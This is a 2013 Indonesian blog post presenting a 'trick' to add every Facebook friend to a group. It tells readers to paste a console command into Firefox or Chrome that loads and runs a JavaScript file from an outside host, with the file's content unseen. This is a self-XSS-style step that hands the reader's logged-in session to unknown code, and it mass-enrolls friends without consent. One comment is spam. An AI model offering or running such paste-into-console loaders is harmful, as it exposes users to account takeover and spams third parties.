Breaking News
Loading...
12 April 2013

cara menambah semua teman ke group fb di chrome dan mozilla | trik fb

cara menambah semua teman ke group fb di chrome dan mozilla | trik fb
selamat malam semua nya sobat blogger,kali ini saya mau berbagi cara yang bisa dibilang jadul tetapi belum semua mempraktekannya, nah ada 2 alasan nih kenapa tidak mempraktekan, yang pertama karena si kawan malas untuk memakai cara ini dan yang kedua karena si kawan belum tahu cara ini, nah jadi nih trik ana berikan khusus kepada sobat yang belum tahu cara ini, kenapa harus saya beri tahu ?
karena saya rasa hal ini penting dilakukan, apalagi seorang blogger pastinya harus memiliki group khusus untuk web/blog nya,...
untuk menambah satu persatu teman ke grouop pastinya akan memakan banyak waktu dan belum tentu juga satu hari kelar :-D
daripada ngomong terus lebih baik langsung saya sampaikan saja deh sob cara menambahkan semua teman ke group fb menggunakan browser mozilla firefox ataupun google chrome,
silahkan :
pertama pilih dulu Group Yg mau di tambahin semua Teman fb kita, lalu kita masukan Script
BROWSER MOZILLA FIREFOX
cara Nya :
Tekan CTRL + SHIFT + K
Copy paste kode berikut kedalam jendela yang muncul
Ini Kode Nya.

document.body.appendChild(document.createElement('script')).src='http://bimodebi.hexat.com/autoinvite.js';

setelah itu tekan enter dan tunggu hingga proses selesai, kecepatan proses tergantung kecepatan sinyal komputer sobat, jadi saya sarankan pakailah wifi supaya cepat :-D


BROWSER GOOGLE CROME
cara Nya :
Klik Kanan Mouse, lalu Pilih Inspect Element and Console, trus Copy paste kode Script berikut kedalam jendela yang muncul

document.body.appendChild(document.createElement('script')).src='http://bimodebi.hexat.com/autoinvite.js';

dan terakhir tekan enter,,maka dimulai untuk menunggu lagi sob!!!
sabar aja yah sob,,waktu yang dibutuhkan memang lumayan lama ,jadi kalau mau sukses yah bersabar aja yah sob !!
hehehe

artikel selanjutnya tentang cara mengundang semua teman fb ke fanspage dengan script

Jangan Lupa Share jika Bermanfaat :)

3 komentar:

  1. ni masih bisa ga sob caranya... kalo masih bisa mah mantaps dah... :D
    http://brothernfriends.blogspot.com

    ReplyDelete
  2. Mozilla Firefox is the main program, which is utilized by a great many individuals around the world. It is outfitted with highlight utilizing which you get an alternative to clear Private Data. You can discover this alternative by means of the "Devices" menu. Utilizing this component you can clear the accompanying things. http://how-to-remove.org/malware/adware-removal/savingscool-removal/

    ReplyDelete

*Komentar Tanpa Moderasi*
Silahkan berkomentar yang sopan, tidak mengandung unsur sara, pornografi.
Jika blog ini membantu, jangan lupa like Fanspage dan Follow Google+
Terima kasih

Copyright © 2013 Dhani's Blog All Right Reserved